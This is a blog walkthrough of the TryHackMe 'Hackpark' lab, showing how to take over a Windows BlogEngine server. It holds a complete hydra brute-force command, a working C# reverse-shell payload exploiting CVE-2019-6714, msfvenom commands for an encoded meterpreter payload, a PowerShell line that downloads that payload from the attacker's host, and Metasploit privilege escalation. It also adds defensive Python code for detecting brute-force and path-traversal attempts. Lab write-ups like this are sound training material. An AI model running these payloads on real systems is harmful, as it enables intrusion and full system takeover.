Friday, February 3, 2023

How I Solved the Hackpark Walkthrough (TryHackMe) – Finxter


CHALLENGE OVERVIEW

  • Link: hackpark
  • Difficulty: Medium
  • Goal: user and root flags on a Windows machine
  • Highlight: using Metasploit to quickly and easily gain root access
  • Tools: nmap, dirb, hydra, burpsuite, msfvenom
  • Tags: RCE (remote code execution), Windows

BACKGROUND

In this box, we'll hack into a Windows machine using standard pen-testing tools. There are two options for solving the box.

I'll demonstrate in this post how to hack into the box with Metasploit. In the upcoming Hackpark Part II post, I'll show how to find the flags without using Metasploit.

ATTACK MAP

IPs

First, let's record our IP addresses as exported bash variables so we can reuse them in later commands.

export myIP=10.6.2.23
export targetIP=10.10.72.99

ENUMERATION

We'll kick things off with a dirb scan and an nmap scan.

/admin is found on targetIP with dirb.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap 10.10.208.243
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST
Nmap scan report for 10.10.208.243
Host is up (0.098s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

The ms-wbt-server service looks interesting. A quick Google search reveals that this port (3389) is used for Windows Remote Desktop. We may come back to it later on in the hack.

PREPPING OUR COMMAND FOR HYDRA

Next, we'll use Firefox in developer mode to inspect the POST request that is sent when we attempt to log in to the /admin portal with generic credentials (admin:pass). The request body carries the ASP.NET __VIEWSTATE and __EVENTVALIDATION fields alongside the username, password and login-button fields, which we will need to reproduce for hydra.


Next, we'll prepare the hydra command that will brute-force our way into the admin portal.

hydra -l admin -P /home/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
  • -l sets the single username to try
  • -P points at the password wordlist
  • http-post-form specifies the request type (an HTML form submitted via HTTP POST); ^PASS^ marks where each candidate password is substituted
  • :Login failed (at the end of the command) is the string that appears in the response after a failed login attempt, so hydra treats any response without it as a success

Results:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-08 18:02:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active
[80][http-post-form] host: 10.10.208.243   login: admin   password: 1qaz2wsx
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-08 18:03:43
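From the defender's side, the hydra run above is very loud: hundreds of POSTs per minute to one login page from one client. The following is an added example (not from the original post or from hydra) of detection logic that counts POSTs to the login page per client IP in a sliding window. The log lines are constructed, the field layout is a simplified IIS-style format assumed for the example, and the 20-per-minute threshold is a placeholder.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/Account/login.aspx"


def _constructed_log():
    """Constructed, chronologically ordered lines (date time method uri-stem query c-ip status).
    Not real logs from the box: 30 POSTs within 10 s from one client, then two ordinary
    requests from another. Failed logins still return HTTP 200 here, because the ASP.NET
    login page re-renders with 'Login failed' in the body instead of sending an error code."""
    base = datetime(2023, 1, 8, 18, 2, 9)
    lines = []
    for i in range(30):
        ts = base + timedelta(seconds=i // 3)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} POST {LOGIN_PATH} ReturnURL=%2fadmin 10.6.2.23 200")
    lines.append("2023-01-08 18:02:20 GET / - 10.10.5.7 200")
    lines.append(f"2023-01-08 18:02:25 POST {LOGIN_PATH} ReturnURL=%2fadmin 10.10.5.7 302")
    return lines


def parse_line(line):
    """Split one log line into (timestamp, method, uri-stem, client_ip, status)."""
    date, time_, method, stem, _query, cip, status = line.split()
    ts = datetime.strptime(f"{date} {time_}", "%Y-%m-%d %H:%M:%S")
    return ts, method, stem, cip, int(status)


def find_login_bruteforce(lines, window_s=60, threshold=20):
    """Peak number of POSTs to LOGIN_PATH per client IP inside any sliding window.
    Returns only the IPs whose peak reaches `threshold`. The status code is ignored on
    purpose: a web-forms login failure is a 200, so volume, not status, is the signal."""
    recent = defaultdict(deque)   # client_ip -> timestamps still inside the window
    peak = defaultdict(int)
    for line in lines:
        ts, method, stem, cip, _status = parse_line(line)
        if method != "POST" or stem.lower() != LOGIN_PATH.lower():
            continue
        q = recent[cip]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=window_s):
            q.popleft()
        peak[cip] = max(peak[cip], len(q))
    return {ip: n for ip, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    print(find_login_bruteforce(_constructed_log()))   # {'10.6.2.23': 30}
```

The same counter works on real IIS logs once parse_line is adapted to the site's W3C field order; rate limiting or lockout on the login control removes the condition hydra needs (unlimited free attempts).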

INITIAL FOOTHOLD

Now we can log in with the user:password combo admin:1qaz2wsx

We're shown an admin dashboard. Searching for BlogEngine on exploit-db.com reveals a possible exploit for us to use: CVE-2019-6714.

To use the exploit, we need to upload the exploit's payload (PostView.ascx) via the file manager. We can then trigger it by accessing the following address in our browser:

http://10.10.172.59/?theme=../../App_Data/files

And we should then be able to catch the revshell with a netcat listener.
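To see why the theme parameter above reaches the uploaded file, here is an added example (not BlogEngine's code and not the exploit) showing the unsafe path construction next to a hardened resolver, plus a check a log reviewer can run over query strings. The site layout, the themes directory and the installed theme names are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed layout (not taken from BlogEngine's source): site root, the directory
# holding installed themes, and a constructed allow-list of theme names.
SITE_ROOT = "/inetpub/blog"
THEMES_ROOT = posixpath.join(SITE_ROOT, "Custom/Themes")
INSTALLED_THEMES = {"Standard", "Garland-Revisited"}


def resolve_theme_unsafe(theme):
    """Vulnerable pattern: the request parameter is joined straight into the path, so
    '../../App_Data/files' (the file manager's upload directory) walks out of the
    themes directory and the uploaded PostView.ascx is what gets compiled and run."""
    return posixpath.normpath(posixpath.join(THEMES_ROOT, theme, "PostView.ascx"))


def resolve_theme_safe(theme):
    """Hardened: accept only a plain theme name that is on the allow-list, and verify
    the resolved path still sits below THEMES_ROOT. Returns None on rejection."""
    if not re.fullmatch(r"[A-Za-z0-9_-]+", theme or "") or theme not in INSTALLED_THEMES:
        return None
    path = posixpath.normpath(posixpath.join(THEMES_ROOT, theme, "PostView.ascx"))
    if not path.startswith(THEMES_ROOT + "/"):   # belt and braces: no escape after normalisation
        return None
    return path


def is_traversal_theme_request(query):
    """Detection helper for web logs: flag a query string whose theme value, after
    URL-decoding (twice, to catch double encoding), contains a parent-directory step."""
    for part in query.split("&"):
        key, _, value = part.partition("=")
        if key.lower() == "theme":
            decoded = unquote(unquote(value)).replace("\\", "/")
            if ".." in decoded.split("/"):
                return True
    return False


if __name__ == "__main__":
    print(resolve_theme_unsafe("../../App_Data/files"))   # escapes to App_Data/files
    print(resolve_theme_safe("../../App_Data/files"))     # None
    print(is_traversal_theme_request("theme=../../App_Data/files"))   # True
```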

PREPARE THE PAYLOAD

We need to change the IP and port (the TcpClient arguments 10.6.2.23 and 8888 below) in the following payload, and then save it as PostView.ascx

payload:
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);

        // Connect back to the listener; change the IP and port to match yours
        using (System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.6.2.23", 8888)) {
            using (System.IO.Stream stream = client.GetStream()) {
                using (System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);

                    StringBuilder strInput = new StringBuilder();

                    // Start cmd.exe with its standard streams redirected
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();

                    // Pass each line read from the socket to cmd.exe
                    while (true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    // Write cmd.exe output back to the socket
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

SET UP THE NC LISTENER

Next, let's spin up a netcat listener on the port used in the payload with the command:

nc -lnvp 8888

TRIGGER THE REV SHELL

Now that our malicious payload is uploaded and our netcat listener is active, all we have to do is navigate to the following address, and we should catch the reverse shell as planned.

http://10.10.172.59/?theme=../../App_Data/files

And … bingo! We've caught the revshell and we're in with our initial foothold!

UPGRADE THE SHELL TO METERPRETER

Now that we're in the shell, we can work on upgrading it to a Meterpreter shell. This will allow us to use many powerful tools within the Metasploit framework.

We'll use python3 to spin up a simple HTTP server that will serve the reverse Meterpreter shell payload file to the Windows machine.

USE MSFVENOM TO CREATE REVSHELL PAYLOAD

The following command will create the payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe

The payload didn't work on my machine, so I added encoding using a standard encoder, "shikata ga nai" (note the different LPORT, 9999, which the handler below must match):

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe

TRANSFER THE MSFVENOM PAYLOAD TO TARGET

Next, we'll transfer the encoded payload from our attack machine to the target machine.

Let's navigate to the directory that holds payload.exe on our attack machine. Then we'll spin up a simple HTTP server (it listens on port 8000 by default) using the command:

python3 -m http.server

Then we'll grab the file from the HTTP server and copy it to our target Windows machine:

powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Windows\Temp\winPEASx64.exe'"

Notice that we save the file in the Temp directory because we have write permissions there. This is a common configuration that can be leveraged as an unprivileged user.

CATCH THE METERPRETER SHELL WITH METASPLOIT

First, let's fire up the Metasploit console:

msfconsole

Then load the generic handler:

use exploit/multi/handler

Next, we need to set LPORT and LHOST to the values used with msfvenom, and set the payload to windows/meterpreter/reverse_tcp

Now that everything is set up correctly, we can run it to boot up the Meterpreter listener:

run

Activate the shell.exe on the target machine to throw a Meterpreter revshell

And we got it! The lower left console window shows the Meterpreter shell.

Now that we're running a Meterpreter shell in msfconsole we can quickly pwn the system with:

getsystem

And view the system information:

sysinfo

We can view our user information with the command:

getuid

Since we're already NT Authority, thanks to the magical powers of Metasploit, we don't have to do anything else except locate and retrieve the two flags.

We found both flags!

In the next post, I'll walk you through an alternate solution to this box without needing Metasploit.
